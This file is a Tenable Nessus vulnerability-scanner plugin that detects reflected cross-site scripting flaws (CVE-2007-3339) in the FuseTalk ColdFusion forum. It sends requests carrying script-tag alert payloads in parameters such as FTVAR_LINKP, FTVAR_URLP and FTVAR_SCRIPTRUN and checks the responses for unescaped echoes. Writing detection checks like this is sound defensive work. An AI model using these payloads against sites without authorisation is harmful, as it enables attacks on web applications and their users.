#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a ColdFusion script that is susceptible
to multiple cross-site scripting attacks. 

Description :

The remote host is running FuseTalk, a discussion forum implemented in
ColdFusion. 

The version of FuseTalk installed on the remote host fails to properly
sanitize user-supplied input to several parameters and scripts before
using it to generate dynamic content.  An unauthenticated remote
attacker may be able to leverage this issue to inject arbitrary HTML
or script code into a user's browser to be executed within the
security context of the affected site. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2007-06/0257.html
http://archives.neohapsis.com/archives/bugtraq/2007-06/0258.html

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";


if (description)
{
  script_id(25553);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3339");
  script_bugtraq_id(24563, 24564);
  script_xref(name:"OSVDB", value:"37141");
  script_xref(name:"OSVDB", value:"37142");
  script_xref(name:"OSVDB", value:"37143");

  script_name(english:"FuseTalk Multiple Cross-Site Scripting Vulnerabilities");
  script_summary(english:"Checks for XSS flaws");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


xss = string("alert('", SCRIPT_NAME, "')");
if (thorough_tests) 
{
  exploits = make_list(
    string("/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=", urlencode(str:'"></a><script>' + xss + '</script><a href="')),
    string("/include/error/autherror.cfm?errorcode=1&FTVAR_URLP=", urlencode(str:'"><script>' + xss + "</script>")),
    string("/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=", urlencode(str:xss))
  );
}
else 
{
  exploits = make_list(
    string("/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=", urlencode(str:'"></a><script>' + xss + '</script><a href="'))
  );
}


# Loop through various directories.
if (thorough_tests) dirs = make_list("/fusetalk/forum", "/forums/forum", "/forum/forum", "/fusetalk/blog", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue.
  info = "";
  foreach exploit (exploits)
  {
    req = http_get(item:string(dir, exploit), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if we see an alert with our exploit.
    if (
      (
       "FTVAR_LINKP=" >< exploit && 
       string('<a href=""></a><script>', xss, "</script><a") >< res
      ) ||
      (
       "FTVAR_URLP=" >< exploit && 
       string('<img src=""><script>', xss, "</script>fusetalk.gif") >< res
      ) ||
      (
       "FTVAR_SCRIPTRUN=" >< exploit && 
       "{ts" >< res &&
       string("<script>", xss, "</script>") >< res
      )
    ) info += '  ' + dir + exploit + '\n';
  }

  if (info)
  {
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "The following URI(s) demonstrate the issues :\n",
      "\n",
      info
    );
    security_warning(port:port, data:report);
    exit(0);
  }
}
